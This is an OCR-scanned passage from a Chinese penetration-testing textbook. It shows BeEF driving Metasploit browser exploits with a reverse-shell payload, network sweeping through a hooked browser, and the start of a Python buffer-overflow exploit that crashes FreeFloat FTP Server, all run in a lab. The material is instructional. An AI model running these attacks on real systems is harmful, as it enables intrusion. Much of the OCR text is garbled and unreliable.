J Metaspioit (1) 





(3 Network (19) 

C Persistence (5) 

G Phonegap (16) 

[.] Social Engineering (21) 


10-22 ”BeEF 中 的 Metasploit 人 模块 


接 下 来 我 们 对 其 进行 设置 ， 在 没有 局 动 BeEF 和 Metasploit 有 的 时 候 ， 
先 切换 到 BeEF-XSS 的 安装 目录 。 


root@kali:~# cd /usr/share/beef-xss/ 
root@kali:/usr/share/beef-xss# ls 


arerules beef cert.pem config.yaml db Gemfile modules 
beef beef key.pem | core extensions Gemfile.lock 





— 


这 里 面 需要 修改 的 是 config.yaml 文 件 ， 执 行 如 图 10-23 所 示 的 命令 。 


config.yaml ooo 


# You may override default extension configuration parameters here 
extension: 





图 10-23 ”打开 config.yaml 文 件 


将 这 里 面 metasploit 后 面 的 enable: 后 面 的 false 修 改 为 tue， 然 后 保 
存 退 出 。 


接 下 来 打开 beef-XSS 日 录 下 而 的 extensions/metasploit 文 件 夹 ， 修 改 
其 中 的 config.yaml 文 件 。 


root@kali:/usr/share/beef-xss# cd extensions/metasploit/ 


root@kali:/usr/share/beef-xss/extensions/metasploit# leafpad 
config.yaml 


对 里 面 的 配置 进行 修改 ， 将 host 的 值 《1 所 在 的 位 置 ) 修改 为 本 机 现 
在 的 地 址 。 


将 host 的 值 和 callback host 的 值 《1 和 2 所 在 的 位 置 ) 修改 为 本 机 现在 
的 地 址 192.168.1.104， 检 查 3 所 在 位 置 metasploit 的 目录 是 否 正 确 。 将 4 所 
在 位 置 的 内 容 修改 为 /usr/share/metasploit-framework/。 修 改 之 前 的 
config.yaml 文 件 如 图 10-24 所 示 ， 修 改 完 的 配置 如 图 10-25 所 示 。 


extension: 
metasploit: 
name: 'Metasploit' 
enable: true 
1 
port: 
user: "msf" 
pass: "abcl23" 
uri: Sapi? 
# if you need "ssl: true" make sure you start msfrpcd with "SSL=y", like: 
# load msgrpc ServerHost-IP Pass-abcl23 SSL-y 
SSL: false 
ssl version: 'TLSv1' 
Ssl verify: true 
2 
autopwn url: "autopwn 
auto msfrpcd: false 
auto msfrpcd timeout: 120 
msf path: [ 
Tos: 05x: 5 path: "VZopt/locat/mst/ F: 
(0s: 'livecd', path: '/opt/metasploit-framework/'), 
(os: 'bt5r3', path: '/opt/metasploit/msf3/'), 
(os: 'bt5', path: '/opt/framework3/msf3/'), 
os: 'backbox', path: '/opt/backbox/msf/'), 
: usr/share/metaspLoit-1ramewor 3 





图 10-24 ”修改 之 前 的 config.yaml 文 件 


*config.yaml eoo0 
File Edit Search Options Help 


host: "192.168.1.104" 

port: 

user: "msf" 

pass: "abcl123" 

uri: '/api' 

# if you need "ssl: true" make sure you start msfrpcd with "SSLzy" 
# load msgrpc ServerHost-IP Pass-abcl23 SSL-y 

ssl: false 

ssl version: 'TLSv1' 


ssl verify: true 

autopwn url: "autopwn" 

auto msfrpcd: false 

auto msfrpcd timeout: 120 

msf path: [ 
(0s: 'osx', path: '/opt/local/msf/'), 
(0s: 'livecd', path: '/opt/metasploit-framework/'), 
(0s: 'bt5r3', path: '/opt/metasploit/msf3/'), 
(0s: 'bt5', path: '/opt/framework3/msf3/ ' ), 
os: 'backbox', path: '/opt/backbox/msf/ ' 









Ty 
pz 


OS: 'win', pa 
os: 'custom', 





图 10-25 ”修改 之 后 的 config.yaml 文 件 


要 记 住 这 个 配置 文件 中 的 user 和 pass 两 个 选项 的 值 ， 如 图 10- 
26 HTZR c 


user: "msf" 
pass: "abcl123" 


图 10-26 ”修改 的 用 户 名 和 密码 


接 下 来 我 们 要 局 动 metasploit， 在 局 动 之 表 要 先 将 metasploit 的 所 有 
服务 局 动 。 


如 图 10-27 所 示 ， 首 先 启 动 postgresql 数 据 库 : /etc/init.d/postgresql 
start 或 者 service postgresql start; KJUR MSF E (天 人 键 步 又 ! ) : 


msfdb init. 


:~# service postgresql start 
:-4 msfdb init 
Creating database user 'msf' 
Enter password for new role: 
Enter it again: 
Creating databases 'msf' and 'msf test' 
Creating configuration file in /usr/share/metasploit-framework/config/database.y 





ml 
Creating initial database schema 
T E 国 


图 10-27 ”启动 postgresql 数 据 库 


接 下 来 ， 在 命令 行 中 使 用 msfconsole 命 令 局 动 metasploit。 


root@kali:~# msfconsole 


成 功 局 动 metasploit 之 后 ， 我 们 束 根 据 刚 才 输 入 的 服务 占 地 址 和 密码 
来 连接 载 入 msgrpc。 


成 功 局 动 之 后 ， 会 得 到 如 图 10-28 所 示 的 结果 。 


msf > load msgrpc ServerHost-192.168.1.104 Pass-abc123 
MSGRPC Service: 192.168.1.104:55552 


MSGRPC Username: msf 


MSGRPC Password: abc123 
Successfully loaded plugin: msgrpc 


图 10-28 ”成 功 局 动 msgrpc 


然后 在 beef 目 录 中 启动 BeEF， 就 会 显示 加 载 了 297 个 Metasploit 模 
志 。 注 意 一 定 要 从 /usrshare/beef-xss 这 个 目录 局 动 BeEFE， 如 网 10-29 上 所 
Zw. SEU ES. 


:~# cd /usr/share/beef -xss/ 
- ./beef 
Bind socket [imapeudoral] listening on [0.0.0.0:2000]. 
Browser Exploitation Framework (BeEF) 0.4.7.0-alpha 
Twit: Qbeefproject 
Site: http: //beefproject.com 





: http://blog.beefproject.com 
| Wiki: https://github.com/beefproject/beef /wiki 
Project Creator: 
Successful connection with Metasploit. 
Loaded 297 Metasploit exploits. 
BeEF is loading. Wait a few seconds... 





图 10-29 ”开始 加 载 Metasploit 人 模块 


重新 打开 BeEF 之 后 ， 可 以 看 到 这 里 面 的 Metasploit 模 块 有 593 个 ， 如 
图 10-30 所 示 。 


如 图 10-31 所 示 ， 单 击 这 个 模块 分 类 左 侧 的 三 角形 融 可 以 展开 里 面 
的 所 有 模块 。 


t E Browser (53) 

t C Chrome Extensions (8) 
t C Debug (8) 

t J Exploits (78) 

t E Host (22) 


b O Persistence (5) 
t Eg Phonegap (16) 


t O Social Engineering (21) 





t O Chrome Extensions (8) 

t CI Debug (8) 

t D Exploits (78) 

t EJ Host (22) 

t [ZJIPEC (8) 

4 3 Metasploit (593) 
B Firefox 5.0-15.0.1  exposedProps  XCS Code E 
D Firefox 8/8 AttributeChildRemoved() Use-After-Free 
D Firefox PDF.js Privileged Javascript Injection 
D Firefox Proxy Prototype Privileged Javascript Injectio 
D Firefox XMLSerializer Use After Free 
D Firefox location QueryInterface() Code Execution 
D Firefox nsSMILTimeContainer::Notity TimeChanger) F 
D Firefax nssSVGVvalue Qut-oft-Bounds Access wUImerab 
B Foxit Reader Plugin URL Processing Buffer Overflow 
B Mozilla Firefax Array.reduceRight() Integer Overflow 
B Mozilla Firefox Bootstrapped Addon Social Engineeri 
B Mozilla Firefox Interleaved dacument.write/'appendCr 
B Mozilla Suite/Firefox compareTo() Code Execution 
t msf firefox pdfjs privilege escalation 
D msf firefox proto crmtrequest 


图 10-31 奉 看 这 个 分 类 下 面 的 所 有 模块 


上 上面 的 这 些 模块 部 是 Firefox 中 可 用 的 ， 但 是 需要 注意 的 是 这 里 并 非 
所 有 模块 部 是 可 以 达到 渗透 效果 的 ， 因 为 这 个 模块 所 针对 的 源 凋 ， 可 能 
在 目标 系统 上 已 经 打上 了 相应 的 补丁 了 。 这 里 我 们 以 其 中 的 一 个 来 介绍 
使 用 方法 ， 例 如 第 一 个 Firefox8/9 AttributeChildRemoved() Use -After- 
Free 漏 洞 ,这 个 漏洞 是 针对 8.0、8.1 和 9.0 版 本 的 firefox， 需 要 设置 的 参数 
如 图 10-32 所 示 。 


Firefox 8/9 AttributeChildRemoved() Use-After-Free 

Description: This module exploits a use-after-free vulnerability in Firefox 8/8.0.1 and 9/9.0.1. Removal of child nodes from the nsDOMAtt 
after removal due to a premature notification of AttributeChildRemoved. Since mFirstChild is not set to NULL until after this « 
accessible after it has been removed. By carefully manipulating the memory layout, this can lead to arbitrary code execution 

Id: 293 

de 

SSLCert: 

SRVHOST: 0.0.0.0 

SRVPORT: 8080 

URIPATH: 5852742f 





generic/custom 


PAYLOADFILE: 


图 10-32 ”为 这 个 模块 设置 参数 


为 了 实现 对 目标 的 控制 ， 这 里 我 们 选择 一 个 常用 的 Payload， 如 图 
10-33 所 示 。 





payload: qeneric/shell_reverse tcp dá 
generic/custom 
LHOST: 


generic/debug trap 

LPORT: generic/shell bind tcp 

generic/shell reverse tcp 
generic/tight loop 
windows/dllinject/bind hidden. ipknock tcp 
windows/dllinject/bind hidden, tcp 
windows/dllinject/bind ipv6. tcp 
windows/dllinject/bind ipv6 tcp uuid 
windows/dllinject/bind nonx tcp 
windows/dllinject/bind tcp 
windows/dllinject/bind tcp rc4 
windows/dllinject/bind tcp uuid 
windows/dllinject/reverse hop http 
windows/dllinject/reverse http 


图 10-33 ”选择 一 个 常用 的 Payload 


选择 完成 后 ， 卫 地 址 和 端口 会 目 动 设置 好 ， 如 图 10-34 所 示 。 


Firefox 8/9 AttributeChildRemoved() Use-After-Free 


Description: This module exploits a use-after-free vulnerability in Firefox 8/8.0.1 and 9/9.0.1. Removal of child nodes from the 
after removal due to a premature notification of Atir E IdRemoved. Since mFirstChild is not set to NULL until ofer 
accessible after it has been removed. By carefully manipulating the memory layout, this can lead to arbitrary code exea 
Id: 293 
SSL: 
SSLCert: 


SRVHOST: 0.0.0.0 
SRVPORT: 8080 


URIPATH: 5852742f 

Payload: generic/shell reverse tcp 54 
LHOST: 192.168.1.104 
LPORT: === 


图 10-34 已 经 设置 好 LHOST 和 LPORT 的 Payload 


然后 根据 所 使 用 Payload 的 设置 在 Metasploit 中 局 动 一 个 handler， 如 
图 10-35 所 示 。 


sf exploit( ) > Set payload java/meterpreter/reverse tcp 
payload => ^ java/meterpreter/reverse tcp 
) > set lhost 192.168.1.104 


) > set lport 6666 





sf exploit( ) > exploit 





图 10-35 “对 Handler 进 行 设 置 


具体 的 步骤 在 之 前 已 经 设置 过 ， 这 里 不 再 歼 述 。 返 回 到 BeEF 界 
面 ， 单 击 Execute 按 钮 ， 如 果 目 标 上 存在 这 个 漏洞 的 话 ， 束 会 返回 一 个 
控制 会 话 handler。 但 定 并 个 建议 这 种 渗透 方式 ， 因为 这 种 方式 的 成 功 深 
A i Metasploit"F H'Jbrowser autopwnra - 


10.4 BeEE 的 其 他 实用 操作 


利用 BeEF 控 制 了 目标 主机 之 后 ， 我 们 还 可 以 进行 一 些 类 似 于 后 滩 
透 之 类 的 操作 ， 例 如 利用 目标 主机 进行 扫 拉 等。 下 面 我 们 利用 这 全 主机 
来 友 现 它 所 在 网 络 的 信息 ， 可 以 使 用 例如 BeEF 中 提供 的 “Ping Sweep” 功 
能 ， 如 图 10-36 所 示 。 


4 —j Network (18) 
>. DADC (2) 

D Cross-Origin Scanner 
6 DNS Enumeration 
e DOSer 
D Detect Burp 
D Detect Social Networks 
D Detect Tor 
D Get Proxy Servers (WPAD) 
O Get ntop Network Hosts 
BIRC NAT Finning 


图 10-36 使 用 “Ping Sweep" 15:30 


然后 在 这 个 “Ping Sweep” 便 块 中 设置 参数 ， 主 要 是 需要 扫 搞 的 目 
标 ， 如 图 10-37 所 示 。 


Ping Sweep 


Description: Discover active hosts in the internal network of the hooked browser. It works by calling a Java method from JavaSc 
For browsers other than Firefox, use the PingSweep Java module. 


Id: 77 

Scan IP rangeg 192.168.1.1-192.168.1.254 
(C class or 

IP): 

Timeout 2000 

ms): 

Delay 100 

between 

requests 

(ms): 


图 10-37 设置 “Ping Sweep" Hf] 


单 击 下 方 方 框 标识 出 来 的 命令 来 得 看 执行 的 结束， 如 图 10-38 所 


Module Results History 


id a date label 
2017-08-27 05:57 command 1 





2 2017-08-27 06:04 command 3 


图 10-38  niuhüp RAHATA 


右 侧 会 显示 这 条 命令 执行 的 结果 ， 如 图 10-39 所 示 。 


Command results 
1 Sun Aug 27 20 
data: host-192.188.1.101 is alive! 
2 Sun Aug 27 20 
data: host-192.1868.1.104 is alive! 


Sun Aug 27 20 
data: host-192.168.1.105 is alive! 


图 10-39 “Ping Sweep” 执 行 的 结果 


这 次 扫描 结果 显示 我 们 在 192.168.1.0/24 这 个 地 址 范围 内 查找 到 了 3 
E 另外 我 们 也 可 以 将 受到 控制 的 主机 设置 为 本 机 的 代理 ， 如 
10-40 所 示 。 




















[ 
pa Hooked Browsers Getting Started xl Logs 
4 (—j Online Browsers 
4 (73 192.168.1.104 Details | Logs | Commands | Rider | XssRays | 











? 9918 











e*t: X Delete Zombie 
? A € 197762 
DEG zn: 





图 10-40 ”将 受到 控制 的 主机 设置 为 代理 


这 时 我 们 就 可 以 利用 这 个 代理 来 完成 很 多 任务 ， 例 如 内 部 网 络 探 
测 、 远 程 主机 扫描 等 工作 。 


10.5 小 结 


本 章 我 们 介绍 了 一 个 新 的 渗透 测试 方法 XSS 〈 路 站 脚本 攻击 ) ， 这 
是 一 种 令 人 防不胜防 的 渗透 方式 ， 用 户 往往 只 是 访问 了 和 恶意 攻击 者 建立 
的 网 站 就 会 被 渗透 。 这 里 我 们 采用 了 “BeEEF” 框 架 演示 了 这 种 攻击 方式 的 
常见 过 程 。 


本 章 首 先 讲解 如 何在 Kali Linux 2 中 启动 这 个 框架 ， 这 个 框架 分 成 前 
& Us S TS Sx AH 2D a, Ms HUS GK 
控制 用 户 的 浏览 右 。 前 人 台 一 共 提 供 了 两 个 界面 : 一 个 是 基本 页 面 ， 夯 一 
个 是 高 级 页 面 。 其 中 高 级 页 面 看 起 来 更 像 是 一 个 真实 的 网 站 。 接 下 来 我 
们 利用 后 人 台 对 目标 进行 了 各 种 渗透 ， 并 将 BeEF 和 Metasploit 结 合 使 用 ， 
这 样 我 们 束 可 以 在 BeEF 中 使 用 Metasploit 中 的 各 种 模块 ， 最 后 我 们 介绍 
了 BeEF 中 提供 的 后 渗透 攻击 模块 。 


到 现在 为 止 已 经 介绍 了 很 多 种 工具 的 使 用 ， 在 下 一 重 中 我 们 要 目 己 
动手 编 与 针对 漏 调 的 渗透 模块 。 


第 11 章 
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之 前 我 们 已 经 学 习 了 如 何 使 用 Kali Linux 2 中 的 各 种 工具 ， 这 些 工具 
的 使 用 很 简单 ， 但 是 这 些 工 具 是 如 何 开发 出 来 的 呢 ? 长 期 以 来 ， 黑 客 们 
一 般 会 把 那些 只 会 使 用 别人 编写 的 工具 的 初学 者 称 之 为 “script kiddie”, 
翻 详 过 来 束 是 我 们 第 说 的 “脚本 小 子 ”。 其 实 这 并 不 是 一 个 纯粹 的 岂 义 
词 ， 但 是 如 果 你 硕 望 成 为 一 个 网 络 安全 方面 的 专业 人 士 ， 那 么 编程 技能 
是 必 不 可 少 的 。 


在 这 一 和 草 中 我 们 来 学 习 一 下 如 何 开 发 一 个 漏 铜 渗透 模块 。 我 们 选择 
的 目标 是 一 个 简单 的 软件 *FreeFloat FTP Server", XE- 3X 4] 5X 
XOGURBJFTPH AS S8. (HEX RAFE RBCAS Cn PEEAE — 1 TX 18$ 83 HJ 
jui. DAE ACRIRI Mf REFERITA RS, Jur n] Heft 
来 控制 安 疼 有 访 软 件 的 计算 机 设备 。 


在 这 一 草 中 我 们 将 会 讲解 如 下 几 氮 和 内容: 


如 何 对 软件 的 次 出 漏洞 进行 测试 
计算 软件 洲 出 的 偏 移 地 址 

查找 JMP ESP 指 令 

编写 渗透 程序 程序 

坏 字 符 的 确定 

使 用 Metasploit 来 生成 Shellcode 





11.1 "nf dE En] Tài. 03 Yis 198] EIT UA 


渗透 工具 看 起 来 功能 是 不 是 十 分 神奇 ? 现在 我 们 束 来 学 习 如 何 实现 
对 一 个 软件 进行 滩 透 ， 这 次 我 们 渗透 测试 的 目标 为 “EreeFloat FTP 
Server”， 这 是 一 个 十 分 简单 的 FTP 工 具 。 我 们 将 这 个 工具 放置 在 虚拟 机 
Windows XP 中 ， 然 后 运行 这 个 工具 ， 如 图 11-1 所 示 。 


IP: 192.168.1.106 fx] 
FreeFloat FIP Serwer 


Por No 
| 21 Unload | 





11-1 FreeFloat FTP Server 


FreeFloat FTP Server 会 在 运行 的 主机 上 建立 一 个 FTP 服 务 器 ， 其 他 
计算 机 上 的 用 户 可 以 登录 到 这 个 FTP 上 来 存 取 文件 ， 例 如 我 们 在 主机 
192.168.1.106 的 C 盘 中 运行 这 个 FTP 软 件 的 话 ， 在 另外 一 台 计 算 机 中 可 以 
使 用 FTP 下 载 工具 或 者 命令 的 方式 进行 访问 。 这 里 我 们 采用 命令 的 方式 
对 其 进行 访问 ， 如 图 11-2 所 示 。 











图 11-2 ”远程 连接 到 FreeFloat FTP Server 


首先 使 用 ftp 命 令 ， 然 后 使 用 open 命 令 打 开 192.168.1.106。 注 意 不 要 
使 用 浏览 器 打开 这 个 ftp， 那 样 做 的 话 你 将 无 法 看 到 登录 过 程 。 


使 用 FreeFloat FTP Serverix 4 Bit 25-86] E 2x 15/41 4E fn] RR E, PREA 
ERRA RR ABHIEAXEXeXEZ, üni11-3Bpzk. 





hETVBIUH <c> 2889 Microso 


$ di — ndash 
68.1.1906 
na 192. 166 1.186. 








Fl Ftp Server 
5 :c192. 168. n y none 


图 11-3 ”输入 任意 的 用 尸 名 


在 这 里 我 们 随意 输入 一 些 字 符 ， 例 如 “aaa”， 然 后 单 击 回 和 车， 如 多 
11-4 上 所 示 。 





连接 到 192.168.1.186 。 
220 FreeFloat Ftp Se 
FH 14192.168.1. 196: c 








图 11-4 输入 任意 的 密码 


同样 密码 也 随意 地 输入 即 可 ， 例 如 输入 “aaa”， 然 后 单 击 回 车 便 可 
登陆 到 FIP， 如 图 11-5 所 示 。 


TIE 192.168.1.106, 
220 FreeFloat Ftp Server Uersion 1.007. 
用 户 cl92.1 168.1.1H86: ee aaa 

rd reguired for aaa. 


ser aaa logged in. 





图 11-5 ”登录 到 FTP 


这 里 显示 用 户 aaa 已 经 成 功 登 录 了 ， 我 们 可 以 使 用 ftp 中 的 任意 资源 
了 ， 其 实 这 里 使 用 任何 一 个 用 户 名 都 可 以 成 功 地 登录 。 


我 们 现在 来 看 看 这 个 工具 是 否 存在 栈 溢出 漏洞 。 现 在 我 们 在 输入 用 
户 名 的 时 候 ， 尝 试 使 用 一 个 特别 长 的 字符 串 作为 用 户 名 ， 来 看 看 在 用 户 
名 输入 的 位 置 是 否 存在 溢出 的 漏洞 ， 比 如 说 输入 数 百 个 “a*， 如 图 11-6 所 
ZJN o 


E 管理 员 : CAWindowsNsystem32ZWcmd.exe - ftp 


ftp» open 192.168.1.186 

jE] 192.168.1.106, 

228 FreeFloat Ftp Server Uersion 1.HH5. 

FH P3&192.168.1.186:€none25: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 





图 11-6 BB T a" TEZJH IP Z 


(FEX ZREDIPPUB WM. WEEET HEEN Y 4 AGERSHPEZRIJRIE. 
图 11-7 所 示 。 


E 管理 局 : CAWiIndowsYsystem32Ncmd.exe - ftp 


ftp> close 

22i Goodbye 

ftp» open 192.168.1.186 

连接 用 | 192.168.1.106, 

228 FreeFloat Ftp Server (Version 1.06). 

FH P3&192.168.1.186:€none25: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 
aaaaaaaaaaaaaaaaaadaaaaaaadaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaadaaaaaaaaaaaaaaaaaa 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 

331 Password required E LE.T- T. T. T. T- T. F- TF F- F- F- T: E: FT: E: F- F- E: F- FF: E- FF: E: E: Ez Es Ec P Es Ec E- Ps Es Ec Es Es Ec Pe Es Ec Ee E Es Es E Ee Es Es T] 
llaaaaaaaaaaaaaaaaaaaaaaaa. 


T 





图 11-7 输入 密码 
这 时 不 要 放弃 ， 我 们 再 尝试 输入 更 多 的 “a” 作 为 用 户 名 ， 如 图 11-8 所 





管理 员 : C:\Windows\system32\cmd.exe - ftp 


ftp> open 192.168.1.1806 

连接 用 | 192.168.1.106, 

220 FreeFloat Ftp Server (Version 1.08». 

H P <192.168.1.106:<none)): LDEEEEEEEEEEEEEEEEEEEEEEELEEEEEEEEEEEEEEEEEEEETETETEEEEEE 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 
CEEEEEEEEEEEEEEEEEEEEEEEEEETEEEEEEEEEEEEEEEEEEEEEEEEEELEEEEEEEEEEEEELELEELTTEEETTEEETLE! 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 
CEEEEEEEEEEEEEEEELEEEEELEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETEEEETELTI 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 
CEEEEELEEEEEEEELEELEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEELEELEELEEEEETETE!I 


aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 


aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 
íjaaaaaaaaaaaaaaaaa 

331 Password required for aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 
aaaaaaaaaaaaaaaaaaaaaaaa. 


zr. 











图 11-8 输入 更 多 的 “a 作 为 用 户 名 


目标 的 系统 仍然 正 篆 出现 了 输入 密码 的 界面 ， 可 见 系统 没有 毅 误 。 
那么 是 不 是 这 个 软件 并 不 存在 洲 出 问题 呢 ? 在 做 渗透 模块 的 编写 的 时 
候 ， 干 万 不 要 在 此 时 束 放 并 ， 我 们 打开 Wireshark 捕 获 的 此 次 登录 的 数据 


| ^ Frame 51750: 139 bytes on wire (1112 bits), 139 bytes captured (1112 bits) on interface 0 
Ethernet II, Src: Micro- 4c:cc:6a:62:4e:29), Dst: Vmware 90:2f:69 (00:0c:29:90:2f:69) 





e 3 
Internet Protocol Version 4, Src: 192.168.1.100, Dst: 192.168.1.106 
Transmission Contro 1 Protocol, Src Port: 8897 (8897), Dst Port: 21 (21), Seq: 1, Ack: 43, Len: 85 





图 11-9 ”使 用 Wireshark 捕 获 登 录 过 程 的 数据 包 


在 这 里 我 们 会 友 现 实际 上 及 送出 去 数据 包 中 的 字符 “a” 的 数量 并 没 
有 那么 多 ， 无 论 我 们 在 登录 用 户 名 时 输入 多 么 长 的 用 户 名 ， 而 实际 上 发 
太 出 去 的 只 有 78 个 “a”。 显 然 这 个 长 度 的 字符 是 无 法 引起 演出 的 ， 那 么 
我 们 有 什么 办 法 可 以 加 大 字符 串 的 数量 呢 ? 


最 直接 的 方法 吏 是 我 们 目 行 构造 数据 包 ， 然 后 将 数据 包 及 达 出 云 ， 
这 样 我 们 想 要 数据 包 中 包含 多 少 个 “a”， 束 可 以 友 壕 多 少 个 “a” 出 去 了 。 


这 里 我 们 首先 编写 一 个 可 以 目 动 连接 到 “FreeFloat FIP Server” 服 务 
器 的 客户 内 脚 本 ， 这 里 面 我 们 采用 Python 语言 来 编写 这 段 脚 本 ，Python 
是 现在 网 络 渗透 界 中 最 为 流行 的 语言 ， 另 外 这 门 语 言 也 极为 简单 。 如 末 
你 之 前 对 Python 一 无 所 知 的 话 ， 我 建议 你 最 好 立刻 开始 对 这 门 语 言 进行 
EM 

好 了 ， 我 们 先 来 建立 一 个 到 “FreeFloat FIP Server" lH 2$ 28 B] XE 2. 
因为 这 个 软件 提供 的 是 FTP 服 务 ， 所 以 我 们 只 需要 按照 连接 FTP 的 过 程 
itn F rud 即 可 ， 而 且 这 段 脚 本 可 以 用 来 连接 到 任何 提供 FTP 服 务 

次 ` 


自 先 我 们 导入 需要 使 用 的 socket 库 。 


import socket 


执行 的 结果 如 图 11-10 所 示 。 


*»» import socket 


图 11-10 在 Python 中 导入 所 需要 的 库 
接着 创建 一 个 socket 套 接 字 。 


s-socket.socket(socket.AF INET,socket.SOCK STREAM) 


执行 的 结果 如 图 11-11 所 示 。 


>>> sas=s0cket .sockettsocket .NF_INET,.socket .SOCEK_STREAMS 





图 11-11 创建 一 个 socket 肆 接 字 
利用 这 个 套 接 字 就 可 以 建立 到 目标 的 连接 。 


connect-s.connect(('192.168.79.131',21)) 


AITZ J RIMEL A] HREN mH AER, Hoe 
FTPRE R: mE RIIA m e HRS ide Ds SHA M 
ME. Ear E AAN MI ARA EM PERETE, TRO 
户 的 输入 与 目 己 保存 的 记录 进行 比 对 。 


我 们 可 以 将 用 户 名 的 输入 作为 一 个 测试 吕 ， 这 也 是 一 个 最 为 第 见 有 的 
情形 。 主 要 是 因为 后 期 的 时 候 ， 很 多 程序 员 都 会 使 用 memcpyO 这 个 函数 
来 将 用 户 的 输入 复制 到 一 个 变量 中 ， 但 是 这 些 程序 员 往 往 会 忽略 对 地 址 
旦 合 越 界 进行 检 查 ， 从 而 导致 数据 的 次 出， 进而 引 及 代码 远程 执行 的 问 


题 。 


好 了 ， 现 在 我 们 就 把 “FreeFloat FTP Server" H P? Z 58 AE 231838 
测试 的 欠 入 点 ， 前 先 来 检查 这 个 软件 是 否 存 在 栈 洲 出 的 现象 ， 这 个 检查 
其 实 很 简单 ， 我 们 在 输入 用 户 名 的 时 候 ， 并 不 像 和 常规 的 那样 ， 输 入 几 个 
perm 而 是 输入 成 百 上 于 的 字符 ， 同 时 观 穴 目 标 服 务 硕 的 反 
Wo 


我 们 首先 来 观察 一 下 ， 正 第 连接 到 目标 服务 硕 上 的 数据 包 的 格式 ， 
如 图 11-12 所 示 。 此 处 使 用 wireshark 抓 取 我 们 输入 用 户 名 的 数据 包 ， 并 


观察 其 中 的 格式 。 





e 51750: 139 kit ire (1112 bits), 139 bytes captured (1112 bits) on interface 0 
m net II, Src: Mic E prune: (4c:cc:6a:62:4e:29), Dst: Vmware 90:2f:69 (00:0c:29:90:2f:69) 
Internet Pr oto col Version 4, Src: 192.168.1.100, Dst: 192.168.1.106 
ub n Control de otocol, Src Port: 8897 (8897), Dst Port: 21 (21), Seq: 1, Ack: 43, Len: 85 














图 11-12 ”登录 的 数据 包 格 式 


图 11-12 中 我 们 输入 的 用 户 名 是 一 段 字 符 ， 这 段 字符 前 面 
“USER”, MA- ANEEMIA”. RIME H socket jr 
中 的 send O 方法 可 以 将 一 个 字符 串 以 数据 包 的 形式 发 送出 去 ， 这 里 面 
我 们 以 成 百 上 千 的 “A” 作 为 用 户 名 。 


s.send('USER AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


AAAAAAAAAAAAAAAAAAN \n ' ) 


CIE" 包 发 送 到 目标 FTP 服 务 器 上 ， 我 们 可 以 看 到 这 个 FTP 服 
务 侣 工具 月 误 了 ， 并 且 出 现 了 如 图 11-13 所 示 的 问题 提示 。 








图 11-13 5E y HEA 


11.2. iE ECCE i H RI f E 3 E 


这 里 显示 软件 “FreeFloat FTP Server” 执 行 到 地 址 “41414141” 处 时 就 
